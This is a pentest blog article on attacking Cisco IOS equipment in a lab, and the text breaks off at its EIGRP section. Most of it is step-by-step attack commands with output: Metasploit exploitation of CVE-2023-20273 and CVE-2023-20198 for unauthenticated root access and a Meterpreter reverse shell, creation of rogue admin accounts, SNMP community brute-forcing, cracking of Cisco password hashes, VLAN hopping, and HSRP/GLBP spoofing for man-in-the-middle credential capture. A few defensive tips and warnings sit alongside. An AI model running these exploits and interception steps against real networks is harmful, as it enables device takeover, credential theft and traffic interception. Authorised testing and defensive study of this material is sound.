Lyrica: Pentesting Cisco IOS

Cisco hardware is distributed around the world and is often the target of attackers. In this article, I will demonstrate a Cisco IOS pentest

Lyrica: Pentesting Cisco IOS

Cisco hardware is distributed around the world and is often the target of attackers. In this article, I will demonstrate a Cisco IOS pentest.

Caster - Lyrica

Genre: Offensive
Label: exploit.org
Release Date: 3 July 2024

Performed by: Caster
Written by: Magama Bazarov
Cover Man: Magama Bazarov (Sony ILCE-7M3, f/5.6, 1/3 sec)

Intro

This article is intended to raise awareness among security engineers when operating Cisco equipment. Although it is an Offensive article, it is intended for both pentesters and network engineers.

"Disciple"

On April 24, 2024, I released a great article on Cisco IOS security, demonstrating the configuration of network security mechanisms. You'll find it useful.

https://blog.exploit.org/caster-disciple/

Disclaimer

This article is for informational purposes and is intended for security specialists conducting testing under an agreed contract. The author and exploit.org are not responsible for any damage caused by the use of the information provided.

Disruption of systems, hacking into other people's computer networks will be prosecuted. Be careful and do not try your luck.

CVE-2023-20273

Represents a vulnerability in the Cisco IOS XE Web UI interface. Essentially, this vulnerability is against the Web UI for managing Cisco IOS hardware.
CVE-2023-20273 is dangerous because it allows an attacker to execute system commands on the device while unauthenticated. Also, with this vulnerability, an attacker can inject a malicious implant to gain full control of the device.

This is a serious problem, not only because of the ease of exploit use, but because Cisco IOS control panels are often overlooked. In production networks this is a big problem, potentially a Cisco IOS device could be on the Internet with an open Web UI, which means an attacker could launch this attack from the Internet by breaching the external perimeter of the network.

I'll demonstrate the process of exploiting this vulnerability using Metasploit so you get the gist of the problem. In my lab network, I have a Cisco CSR under IP address 192.168.1.89 that is vulnerable to CVE-2023-20273.

caster@kali:~$ msfconsole
msf6 > use auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273 
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > show options

Module options (auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273):

   Name                   Current Setting  Required  Description
   ----                   ---------------  --------  -----------
   CISCO_ADMIN_PASSWORD                    no        The password of an admin account. If not set, CVE-2023-20198 is leveraged to create a new admin password.
   CISCO_ADMIN_USERNAME                    no        The username of an admin account. If not set, CVE-2023-20198 is leveraged to create a new admin account.
   CMD                    id               yes       The OS command to execute.
   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
   REMOVE_OUTPUT_TIMEOUT  30               yes       The maximum timeout (in seconds) to wait when trying to removing the commands output file.
   RHOSTS                                  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                  443              yes       The target port (TCP)
   SSL                    true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                                   no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > 

cisco_ios_xe_os_exec_cve_2023_20273 module

msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set RHOSTS 192.168.1.89
RHOSTS => 192.168.1.89
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > run
[*] Running module against 192.168.1.89

uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0

[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > 

Successful exploitation, launching the id command (RCE)

CVE-2023-20273 exploitation screenshot. root

So it is possible to attack Cisco IOS using this vulnerability, this is a serious issue, proving once again how important it is to filter access to the control panels of your network equipment

CVE-2023-20198

This vulnerability is also related to the Cisco IOS XE Web UI Feature. CVE-2023-20198 occurs due to incorrect path validation in nginx filtering, which allows bypassing authentication and accessing the webui_wsma_http web interface endpoint. This workaround gives the attacker the ability to execute arbitrary Cisco IOS commands or make configuration changes with level 15 privileges.
In fact, because of this vulnerability, the attacker gains full control over the hardware.

Exploiting this vulnerability is very simple, all you need to do is download the exploit and conduct the attack. Another problem is the ease of exploitation, even a high school student can handle it.

caster@kali:~$ git clone https://github.com/smokeintheshell/CVE-2023-20198

With the -c argument, you can check the target hardware for this vulnerability:

caster@kali:~/CVE-2023-20198$ ./exploit.py -t 192.168.1.89 -c
Testing for vulnerability
Target IP:	192.168.1.89
Target URL:	http://192.168.1.89/%2577eb%2575i_%2577sma_Http
Vulnerable:	True
IOS Ver:	CSR1000V CSR IOS 17.3 Cisco IOS Software [Amsterdam], Virtual XE Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 17.3.2, RELEASE SOFTWARE (fc3)

Done.
caster@kali:~/CVE-2023-20198$ 

The target Cisco CSR is affected by this vulnerability

Getting the configuration

The -g argument allows you to unload the entire configuration of the vulnerable hardware:

caster@kali:~/CVE-2023-20198$ ./exploit.py -t 192.168.1.89 -c
Configuration of a vulnerable Cisco CSR

Creating an attacker account

You can create an account to get into the control panel:

caster@kali:~/CVE-2023-20198$ ./exploit.py -t 192.168.1.89 -a -u caster -p deftones-myownsummer
Selected Target:	192.168.1.89
Adding New Privilege 15 User
Add User Name:	caster
Add User Pass:	deftones-myownsummer

Sending exploit to target URL:	http://192.168.1.89/%2577eb%2575i_%2577sma_Http

No reportable output from adding users
Check verbose ouput or get running config
Done.
Control Panel (UI)
Web UI Control Panel

Execution of IOS system commands

It is also possible to execute IOS system commands when exploiting this vulnerability:

caster@kali:~/CVE-2023-20198$ ./exploit.py -t 192.168.1.89 -e "show run | sec username"        
Selected Target:	192.168.1.89
Running in Exec Mode
Executing Command:	show run | sec username

Sending exploit to target URL:	http://192.168.1.89/%2577eb%2575i_%2577sma_Http

username gestalt privilege 15 secret 9 $9$jyjNL./i5hMWCk$RrpsXqSmozq1KHYuGQQXtzv3mpQOKoNFyLr6EfUlubo
username death privilege 15 secret 5 $1$QRIf$jgEB4g2.MCKm.upWbfLbM0
username pregabalin150mg privilege 10 secret 8 $8$vsgWwxvLQJiDYU$D1rCRMZLhdphSn82D9rwpeCF5ZG75TY.15okuL/L1K2
username caster privilege 15 secret 9 $9$L4H.qKvAZ6tbW.$eEcAWawEJjbetZImz7Dlduw1d.fHeDiQQYBvXbfPGsc

Done.
Account information on the vulnerable Cisco CSR and password hashes

This is how the CVE-2023-20198 vulnerability is exploited.

CVE-2023-20273 & CVE-2023-20198 Exploitation

Metasploit has a special module cisco_ios_xe_rce, it exploits a chain of two vulnerabilities, CVE-2023-20198 and CVE-2023-20273. This leads to RCE and running the Meterpreter shell.

caster@kali:~$ msfconsole
msf6 > use exploit/linux/misc/cisco_ios_xe_rce

[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/misc/cisco_ios_xe_rce) > 
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.1.89
RHOSTS => 192.168.1.89
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.103:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'geuYApUX' with password 'UFcNqxge'
[*] Removing user 'geuYApUX'
[*] Sending stage (3045380 bytes) to 192.168.1.89
[*] Meterpreter session 1 opened (192.168.1.103:4444 -> 192.168.1.89:58492) at 2024-07-02 21:37:55 +0500

Exploitation and appearance of the meterpreter shell

Meterpreter Shell
IOS Shell (uname -a & id)

A final word on these two vulnerabilities

The ease of exploitation of these vulnerabilities, as well as the consequences, further demonstrates the critical importance of monitoring access to your equipment's control panels. Especially if your equipment is facing the Internet.
This is a warning to network engineers, be careful and check your Cisco IOS control panel accesses to avoid what I have demonstrated above.

I will show a small example of how you can protect Cisco IOS control panels from attack, using ACL sheets.
Suppose we have a network of administrators 10.251.140.0/24, only this network can access the control panel of Cisco equipment, other subnets will be blocked.

CSR(config)# ip access-list standard VTY_SEC
CSR(config-std-nacl)# permit 10.251.140.0 0.0.0.255
CSR(config-std-nacl)# deny any
CSR(config)# line vty 0 15
CSR(config-line)# access-class VTY_SEC in
CSR(config-line)# login on-failure log
CSR(config-line)# login on-success log
CSR(config)# ip http access-lists VTY_SEC
CSR(config)# ip http secure-server

This is how you can restrict access to the Cisco IOS hardware control panel, a fairly simple technique. Access to VTY only from the 10.251.140.0/24 network, others will be blocked access.

Evading RA Guard

RA Guard is designed to filter out illegitimate RA messages. Typically, an attacker uses RA to impose itself as a default gateway address at the IPv6 layer or as a DNS server at the IPv6 layer.
A popular tool among pentesters is mitm6; by manipulating RA/DHCPv6 messages, it allows an attacker to impose itself as a DNS server at the IPv6 level while performing an incomplete SLAAC attack.
However, it is worth noting that mitm6 relies more on DHCPv6 messages than RA.

An incomplete SLAAC attack is a phenomenon in which the attacker does not impose itself as a full-fledged default gateway address, limiting itself to only affecting DNS information

This is what an RA (Router Advertisement) message looks like:

RA Packet (Type 134)

Running mitm6 with the --no-ra flag will allow mitm6 to run without sending RA messages to evade RA Guard:

caster@kali:~$ sudo mitm6 -i eth0 --no-ra
RA packet missing with --no-ra argument

This way you can evade RA Guard if it is active on the switch at the time of your penetration testing project.

However, this attack will be thwarted by configured DHCPv6 Snooping

Identifying the Cisco IOS version

The definition of Cisco IOS is critical information for a pentester. A pentester who knows the Cisco IOS version can learn about its specifics, and it is also possible to find an exploit for a particular Cisco IOS version.

CDP

Is a neighbor discovery protocol for Cisco IOS hardware, but in most cases it is active by default on all ports on a Cisco device. This is what an attacker will see when analyzing the traffic:

CDP frame (Cisco 3560)

This sensitive information can play a big role for the attacker. It is important to monitor the status of CDPs on device ports and carefully turn them off. Also consider that there may be VoIP on the network that depends on CDP.

SNMP

It is a protocol designed for monitoring network infrastructure, but SNMP is not an uncommon target of attacks inside a network. SNMP in the hands of a pentester can serve as a tool to gather information about hardware. This is accomplished by brute-force SNMP community string, with which the attacker can list information about the hardware.

Bruteforce SNMP Community string is possible with onesixtyone:

caster@kali:~$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 192.168.1.89
Bruteforce SNMP Community string (Cisco CSR)

In the context of our case study, two strings are found, public and private
In practice, public and private are the default strings in most cases. By the way, this is a common network security problem in production, many people forget about it.
In my lab bench at a Cisco router, the string public has read-only (RO) permissions, private has both read and write (RW) permissions.


A string with RO rights can be used to collect equipment information. For example, you can use the snmp_enum module in Metasploit, a very handy tool.

msf6 auxiliary(scanner/snmp/snmp_enum) > show options

Module options (auxiliary/scanner/snmp/snmp_enum):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMUNITY  public           yes       SNMP Community String
   RETRIES    1                yes       SNMP Retries
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      161              yes       The target port (UDP)
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    1                yes       SNMP Timeout
   VERSION    1                yes       SNMP Version <1/2c>


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/snmp/snmp_enum) > 

My router in the lab has an address of 192.168.1.89, so let's specify it in RHOSTS

msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 192.168.1.89
RHOSTS => 192.168.1.89
msf6 auxiliary(scanner/snmp/snmp_enum) > run
Result of snmp_enum module operation

This is roughly how you can discover the Cisco IOS version. By analyzing CDP protocol traffic and using SNMP renumbering, having previously guessed the community string.

Cisco Passwords

Cisco IOS passwords reside locally on the hardware and are protected using cryptographic hash functions. However, there are security issues here as well, in the form of insecure password hashing methods. Below I will explain why.

Type 4

Appeared in 2013, it uses the PBKDF2 and was originally designed to reduce vulnerability to brute force attacks. However, due to an implementation issue, the Type 4 algorithm only performs one SHA-256 iteration (without using salt) over the entered plaintext password, making it less secure than Type 5 and more vulnerable to brute force attacks. Passwords are stored as hashes in a configuration file

username myths secret 4 g1rTD89b38NIXbGJse.zLc7Cega1TBTlKQNvYDh9Qo6

Such hashes can be bruteforсed using John the Ripper. Just specify the file with the hash and the path to the dictionary, nothing complicated

caster@kali:~/gestalt$ cat hashes 
myths:g1rTD89b38NIXbGJse.zLc7Cega1TBTlKQNvYDh9Qo6
caster@kali:~/gestalt$ john hashes --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 512/512 AVX512BW 16x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
P@ssw0rd         (myths)     
1g 0:00:00:00 DONE (2024-06-30 02:28) 50.00g/s 6553Kp/s 6553Kc/s 6553KC/s 123456..kovacs
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed. 
Cracked Type 4 password

Type 5

Type 5 uses a very simple MD5 hashing algorithm - 1000 iterations of MD5 with a 32-bit salt. Type 5 passwords are relatively easy to crack by brute force using modern computers and available tools. Passwords are stored as hashes in a configuration file.

caster@kali:~/gestalt$ cat hashes 
drift:$1$TlXl$FlGAzr9Hn8VqowimPu.TD/
caster@kali:~/gestalt$ john hashes --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 512/512 AVX512BW 16x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cisco            (drift)     
1g 0:00:00:00 DONE (2024-06-30 02:38) 20.00g/s 491520p/s 491520c/s 491520C/s 210586..20032003
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
Cracked Type 5 password

Type 7

An extremely insecure way to protect passwords, it uses the Vigenère cipher. It is very easy to crack. using tools such as ciscot7, cisco7crack.

username enchant password 7 055A545C7519
caster@kali:~/gestalt$ cisco7crack 055A545C7519
Encrypted string : 055A545C7519
Plain string     : 12345
caster@kali:~/gestalt$ 
Cracked Type 7 password

TACACS+

This protocol is similar to RADIUS and is used in the Cisco ecosystem to control access to equipment using a AAA server.
However, there is a risk of TACACS+ traffic being intercepted and the key being brute force, so care must be taken to keep the TACACS+ key secure

If an attacker performs a MITM attack and intercepts TACACS+ traffic, they have the ability to brute force the key. To intercept and brute force the attacker uses Loki

Cracked TACACS key
Inserting a key into Wireshark
Decrypted TACACS protocol header

So if you have TACACS+ on your network, take care of key bruteforce resistance.

SMI (2960-X)

Operation of Cisco Smart Install among pentesters is not new. However, there is a risk of disrupting the Cisco 2960-X switch. For some reason 2960-X reacts strangely to SIET exploit and at the moment of exploitation DoS occurs and the switch freezes, not even responding to ICMP Echo requests.

If you find SMI (TCP/4786) in your project, please check with your client to see if 2960-X is there by any chance. If it is present - do not take risks and do not exploit this hole. Be careful with SIET.

Don't use CAM Table Overflow

I have noticed that this attack is often explained in network security training materials, but this attack is not applicable to production networks.
CAM Table Overflow can not only overload the switch CPU but also cause Unicast Flood. This is a phenomenon where Unicast traffic starts to propagate as broadcast traffic. This can have a serious impact on network performance.
This attack sounds cool only in words, but I would not recommend using this attack in production. CAM Table Overflow has serious side effects.

VoIP VLAN Hopping

The Cisco Discovery Protocol (CDP) can be used by attackers to perform VLAN Hopping, allowing unauthorized access to various VLANs, including VoIP VLAN.

Concept

The concept is simple enough. You need to capture a CDP frame of a legitimate VoIP phone, and then use tcpreplay to replay that frame so that the attacker's laptop can pretend to be the phone to gain access to the Voice VLAN.

Stage I: Learning about switch port information

It is necessary to study the operation of the switch port, information how it is configured. This is accomplished by analyzing the CDP frame. You will have to temporarily disconnect the VoIP phone and connect your device into the switch.

CDP from Cisco switch

Based on the dump of this traffic we can see that the port is indeed configured for Voice VLAN.
The switch port is GigabitEthernet1/0, Voice VLAN ID is 512

Stage II: Capture and analyze a CDP frame from a phone

Now plug the VoIP phone back into the switch, and plug yourself into the VoIP phone's data port. Now we need to capture a CDP frame from the VoIP phone itself. I'll be using Wireshark for this.

CDP from VoIP

Phone - Cisco IP Phone 7945G
Voice VLAN ID - 512
I need to save this traffic dump.

Stage III: Play back a CDP frame from VoIP

Now you need to replay the captured pcap to pretend to be an IP phone.
This can be done with tcpreplay, a utility that will replay the traffic. When the CDP frame of the VoIP phone arrives on the switch port, the voice VLAN will be available to the attacker.

However, you must consider that a Cisco legacy phone would send a CDP frame every 60 seconds. You need to send this frame every 60 seconds, you can also use watch to do this

caster@kali:~$ sudo watch -n 60 "tcpreplay -i eth0 cdpvoip.pcap"

Stage IV: Virtual VLAN Interfaces

After playing a CDP frame, a virtual 802.1Q interface must be created to work with the Voice VLAN. It is required to work with the target VLAN.

caster@kali:~$ sudo apt install vlan
caster@kali:~$ sudo vconfig add eth0 512
caster@kali:~$ sudo ip link set eth0.512 up
caster@kali:~$ sudo dhclient -v eth0.512

Create the interface using vconfig, raise to the up state, and then request an address via DHCP. The attacker can obtain the address either by DHCP or by configuring it statically.

This concludes the chapter on VoIP VLAN Hopping, despite the presence of the voiphopper utility that automates the whole process, I decided to explain this attack in detail so that you can better understand what is involved.

DTP Attacks (VLAN Hopping)

One of the most common network attacks on Cisco equipment, an extremely hackneyed topic really. However, it is a rare misconfig. It occurs on forgotten ports of Cisco 2960 switch, a kind of Shadow IT.
Most likely, such a port will be encountered in the context of an internal pentest in the customer's infrastructure.

The essence of a DTP attack is to send a specially prepared DTP Desirable frame that will switch the switch port to Trunk.
The problem is that all Cisco 2960 switch ports are in Dynamic Auto mode by default. And if a DTP Desirable frame is sent to such ports, the switch port will switch to trunk mode. It is important to take into account that the dynamic trunk lives only 5 minutes, so the DTP Desirable frame will have to be sent with a certain periodicity in order not to lose the trunk.

DTP frames on the air

You can use the Loki tool to attack the DTP.

Sending DTP Desirable frame

Now the switch port to which the attacker is connected is switched to trunk mode.

STP frames with 802.1Q tags

By analyzing the STP frames after VLAN switching, we can see the VLAN ID (Root Bridge System ID Extension)
VLANs: 120,140,175,180,200

Also looking at these STP frames, we can see 802.1Q tags there. This is understandable, because we are on a trunk port, and the frames are tagged on the trunk port. That's just for the record.

Now for the target VLAN IDs, you need to create virtual interfaces to jump to those VLANs. You can use vconfig to do this:

caster@kali:~$ sudo vconfig eth0 120
caster@kali:~$ sudo vconfig eth0 140
caster@kali:~$ sudo vconfig eth0 175
caster@kali:~$ sudo vconfig eth0 180
caster@kali:~$ sudo vconfig eth0 200

caster@kali:~$ sudo ip link set eth0.120 up
caster@kali:~$ sudo ip link set eth0.140 up
caster@kali:~$ sudo ip link set eth0.175 up
caster@kali:~$ sudo ip link set eth0.180 up
caster@kali:~$ sudo ip link set eth0.200 up

You then need to obtain addresses for these virtual interfaces for networking within the target VLANs:

caster@kali:~$ sudo dhclient -v eth0.120
caster@kali:~$ sudo dhclient -v eth0.140
caster@kali:~$ sudo dhclient -v eth0.175
caster@kali:~$ sudo dhclient -v eth0.180
caster@kali:~$ sudo dhclient -v eth0.200

Example of obtaining an address via DHCP for interface eth0.140

Received DHCP address for eth0.140

This is how VLAN hopping can be accomplished using the shortcomings of the DTP protocol.
In fact, this case is rare, but that doesn't mean it won't happen at all.

HSRP Attacks

HSRP (Hot Standby Router Protocol) - is a router redundancy protocol developed by Cisco to improve network availability. It allows multiple routers to share a single virtual IP address, providing automatic switchover to a backup router in the event of a primary router failure. This is one of the protocols of the FHRP (First Hop Redundancy Protocol) class.
Used in Cisco networks, it offers a hot standby system but does not do load balancing. This chapter deals with an HSRP attack followed by a MITM attack.

HSRP Theory

HSRP works by creating a group of routers, one of which is designated as the active router and the others as backup routers. The active router is responsible for handling traffic using a virtual IP address. If the active router fails, one of the standby routers automatically becomes the active router, ensuring continuity of service.

You can delve a little deeper into HSRP terminology to understand what kind of entities the HSRP group has:

HSRP Active — a device that acts as a virtual router and provides forwarding of traffic from source networks to destination networks.
HSRP Standby — a device that acts as a standby router, waiting for the active router to fail. When the primary Active router fails, the Standby router will take over the primary role and take over the duties of the Active router.
HSRP Group — a group of devices that ensures the operation and fault tolerance of a logical router.
HSRP MAC Address — the virtual MAC address of the logical router in the HSRP domain.
HSRP Virtual IP Address — This is a special virtual IP address in the HSRP group. This IP address will be the default gateway for the end hosts, used on the logical router itself.

This protocol has two versions (HSRPv1, HSRPv2) and they differ in the following characteristics:

  • Virtual MAC addresses: (HSRPv1 — 00:00:0c:07:ac:XX / HSRPv2 - 00:00:0C:9F:FX:XX) (XX - HSRP group number)
  • Multicast addresses: HSRPv1 — 224.0.0.2, HSRPv2 - 224.0.0.102
  • Number of groups: HSRPv1 offers up to 255 groups, when HSRPv2 can up to 4096

Theory of attack

The essence of an HSRP domain attack is to send a false HSRP packet with the maximum priority value. This is done to take over the Active role, and in fact the attacker's device will serve the entire segment traffic - MITM attack
However, this attack is dangerous because if the attacker fails to handle such a heavy load, the traffic of all hosts in the segment will go through the attacker's device. And besides, it is impossible to jump beyond the capacity of the switch port you are connected to.
If you decide to launch this attack, make sure you have a powerful computer and a fast network interface. It would be funny if you spoofed FHRP with a 100-bit interface.

HSRP Lab Network

In my lab, the attacker is on the 172.16.0.0/24 network.
There are two HSRP speakers, under IP addresses 172.16.0.1 and 172.16.0.2, they serve a virtual HSRP address 172.16.0.254 which is the default gateway for legitimate clients.
The attacker's IP address is 172.16.0.3 - it will attack the HSRP domain

For spoofing, I'll be using the Loki tool. It is an old but very powerful tool for network attacks. It supports attacks against FHRP, HSRP among others, even with authentication support.
I will be using it in the course of my work.

Preparing and tuning the kernel

However, before MITM, you need to prepare your host, allow routing, and perform kernel tuning.

  1. A classic of the genre: switch your interface to promiscuous mode and allow routing. Allowing routing is a very important setting, because without it, during MITM, traffic from legitimate hosts will bump into your OS and will not go any further, which will cause DoS. It is also best to disable ICMP Redirect. When MITM occurs, your machine may generate these messages, which will alarm IDS/IPS system sensors.
caster@kali:~$ sudo ip link set dev eth0 promisc
caster@kali:~$ sudo sysctl -w net.ipv4.ip_forward=1
caster@kali:~$ sudo sysctl -w net.ipv4.conf.all.accept_redirects=0
caster@kali:~$ sudo sysctl -w net.ipv6.conf.all.accept_redirects=0
  1. FTP, H.323 and other traffic that does not work well with NAT can pass through you. The nf_conntrack module will help to pass traffic of such protocols.
caster@kali:~$ sudo modprobe nf_conntrack
  1. With MITM, your device must be prepared to handle a lot of traffic. You can tweak the Linux kernel a bit to optimally handle the large amount of traffic you will receive during network spoofing.
caster@kali:~$ sudo sysctl -w fs.file-max=100000
caster@kali:~$ sudo sysctl -w net.core.somaxconn = 65535
caster@kali:~$ sudo sysctl -w net.core.netdev_max_backlog = 65536
caster@kali:~$ sudo sysctl -w net.ipv4.tcp_fin_timeout=15
caster@kali:~$ sudo sysctl -w net.ipv4.tcp_tw_reuse=1
caster@kali:~$ sudo sysctl -w net.ipv4.tcp_tw_recycle=1
caster@kali:~$ sudo sysctl -w net.ipv4.tcp_max_tw_buckets=65536

fs.file-max=100000 - increases the maximum number of file descriptors that can be opened simultaneously. This is important because each network connection requires a file descriptor. Increasing this value allows your laptop to handle more connections at the same time;
net.core.somaxconn = 65535 - sets the maximum number of pending connections in the queue for sockets. In a MITM attack, especially FHRP spoofing, there may be many incoming connections waiting to be processed. This value increases the connection queue, which prevents connections from being dropped;
net.core.netdev_max_backlog=65536 - sets the maximum number of packets that can be queued on a network interface before being processed by the kernel. This allows your laptop to handle large amounts of incoming traffic more efficiently, which is critical for MITM attacks;
net.ipv4.tcp_fin_timeout=15 - reduces the waiting time before closing a connection after sending a FIN segment. This helps free up resources for new connections faster, which is useful for the large number of short connections typical of MITM attacks;
net.ipv4.tcp_tw_reuse=1 - allows you to reuse temporary (TIME-WAIT) TCP connections for new connections. This helps to avoid port shortages when there are a large number of short-lived connections;
net.ipv4.tcp_tw_recycle=1 - includes fast processing of temporary (TIME-WAIT) TCP connections. This allows resources to be released faster for new connections, which can be useful in heavy traffic, although it carries security risks;
net.ipv4.tcp_max_tw_buckets=65536 - increases the maximum number of temporary (TIME-WAIT) TCP connections that the system can handle simultaneously. This allows your laptop to handle more connections without dropping them prematurely.

  1. TCP Window Scaling controls the scaling of the TCP window. Increasing the TCP window can improve data transfer performance in a high latency or high load network. In TCP, each side sets the size of the window. The appropriate number of bytes can be sent without acknowledgment. Window Scaling provides the ability to increase this window size, which is especially useful when dealing with high-speed networks.
caster@kali:~$ sudo sysctl -w net.ipv4.tcp_window_scaling=1

Spoofing

You need to launch Loki and select the network interface to attack. In my case, it is eth0

Loki found the HSRP packets
Wireshark found HSRP packets

If we analyze the HSRP traffic in more detail, we can see that the Active router priority is 150, which is less than 255. The group number is 1 and there is no authentication.

Then you need to start spoofing by clicking on Get IP and also check the Gratuitous ARP box.

Gratuitous ARP - this is a special type of ARP frame that notifies the entire link segment that a new MAC address and IP address mapping has occurred.
The beginning of spoofing
HSRP attacker packet with priority 255

You must then assign the HSRP virtual address to your interface as a secondary. Since we start serving this address after the attack, it is very important to put it on our interface.

caster@kali:~$ sudo ifconfig eth0:1 172.16.0.254 netmask 255.255.255.0

You will then need to configure a new default route and delete the old one. The new route will need to be built through the former Active router. If this is not done, legitimate host traffic will be closed to the attacker's computer, which will inevitably lead to DoS.

caster@kali:~$ sudo route del default
caster@kali:~$ sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 172.16.0.1

You can also enable NAT, to capture not only incoming traffic, but also outgoing traffic.

caster@kali:~$ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
However, this NAT rule may cause side effects. For example, a customer's infrastructure may have Zabbix agents that an attacker could spoof. And this rule could lead to the fact that the Zabbix server could no longer reach Zabbix agents, because it would essentially spoof the addresses of legitimate hosts.

This concludes the attack on HSRP, it's time to analyze the traffic for sensitive data:

Captured FTP account

Verification of a captured lyrica account:

Authentication Cracking

Potential authentication in the HSRP domain can make life difficult for an attacker, but the mere presence of authentication does not mean anything, an attacker may well be able to brute force the authentication password.

This is accomplished by listening and recording traffic, then exfiltrating the hashes with hsrp2john.py, and then bruteforcing with John.

HSRP MD5 Authentication header
caster@kali:~/lyrica$ python2 hsrp2john.py hsrptraffic.pcap
HSRP MD5 hashes
Bruteforce with John

This is how you can perform an authentication attack on an HSRP domain. The password is myownsummershoveit

GLBP Attacks

GLBP (Gateway Load Balancing Protocol) is a protocol developed by Cisco to provide load balancing and fault tolerance in networks. It allows multiple routers to share a single virtual IP address and dynamically distribute load among them.

Another protocol from the FHRP class and also made by Cisco engineers. This protocol differs from HSRP in that it offers load balancing in addition to redundancy.

GLBP Theory

GLBP works by creating a group of routers, one of which is designated as the active virtual gateway (AVG) and the others as active virtual forwarders (AVFs). The AVG is responsible for load balancing among the AVFs by assigning to each request the virtual MAC address of one of the AVFs.

GLBP terminology is as follows:

  • AVG (Active Virtual Gateway) — a device that is essentially the father of the entire GLBP logical domain. AVG tells the other routers how to handle legitimate traffic. Gives out MAC addresses and is responsible for answering ARP requests. By the way, within a single GLBP group, AVG members can be only one router.
  • AVF (Active Virtual Forwarder) — the device in the GLBP domain that handles traffic. There can be several of them.
  • GLBP Group — A logical GLBP group that includes physical routers. Each GLBP logical group has its own unique numeric identifier
  • GLBP MAC — The virtual MAC address of the AVF members distributed by the existing AVG router.
  • GLBP Virtual IP Address — The IP address the AVG router is responsible for
  • GLBP Preempt Mode — an option that allows the resurrected AVG device to regain its role after being replaced by AVF based on its priority values. By default, preempt mode is disabled for AVG members when preempt mode is enabled for AVF members (with a delay of up to 30 seconds, but this value can be configured manually)
  • GLBP Weight — metric indicating the degree of load on the device interface. The greater this metric is, the higher the load on the router interface.

GLBP Spoofing Theory

It's actually the same thing with HSRP. Send the packet with the highest priority and weight value. This will also happen with Loki.

GLBP Lab Network

In my lab, the attacker is on the 172.16.0.0/24 network.
There are 2 GLBP speakers here, 172.16.0.1 is an AVG router when 172.16.0.2 is an AVF router. They serve the address 172.16.0.0.254.
The attacker's address is 172.16.0.3

GLBP Spoofing

The preparation is the same as I covered in the HSRP chapter, keep in mind.

Likewise, start Loki and choose your network interface.

Loki found the GLBP packets

This is what a GLBP packet from an AVG router looks like. Priority is 130, GLBP group number is 1.

Now you need to do some spoofing, you should also click on Get IP and select Gratuitous ARP.
Loki will generate a special GLBP packet with a priority of 255 and a weight value of 255. The higher the GLBP weight, the higher the load on the interface.

Loki spoofs GLBP
GLBP packet with maximum priority value

Then set the GLBP virtual address as the secondary address on its interface:

caster@kali:~$ sudo ifconfig eth0:1 172.16.0.254 netmask 255.255.255.0

And then set up a new default route through the former AVG router, deleting the old one before doing so. Again, if you don't do this, legitimate hosts traffic will be closed to your device, which will lead to DoS.

caster@kali:~$ sudo route del default
caster@kali:~$ sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 172.16.0.1

This completes the attack on GLBP, you can listen to the traffic for sensitive data:

Captured FTP credentials

Verify this account from FTP:

This is how the GLBP is being attacked. The attack actually carries a lot of risks, so it is not always used, even if the GLBP configuration is vulnerable to this attack

Searching for subnets with EIGRP

EIGRP (Enhanced Interior Gateway Routing Protocol) - is a dynamic routing protocol developed by Cisco for use in enterprise networks. It is efficient and scalable, but can be vulnerable to attack if not properly configured.

In fact, there are plenty of attacks on dynamic routing, but they have very little impact. Perhaps the most practical attack is subnet discovery.
Its essence lies in the fact that the attacker connects to the routing domain, and since at the moment of establishing a neighborhood there is an automatic exchange of routing information - the attacker already knows about these or those subnets, without resorting to scanning. This is a useful time-saving trick.

EIGRP Packets

Within my lab network, there is an EIGRP speaker under the address 192.168.1.89
The AS number is 100.

FRRouting

With FRR, an attacker can connect to the EIGRP routing domain. But it requires a little bit of configuration.

caster@kali:~$ sudo apt install frr

After installing FRRouting, you must make an adjustment to the daemons configuration file, specify eigrpd=yes

caster@kali:~$ sudo nano /etc/frr/daemons
caster@kali:~$ sudo systemctl restart frr

Now you need to log in to the FRR control panel:

caster@kali:~$ sudo vtysh

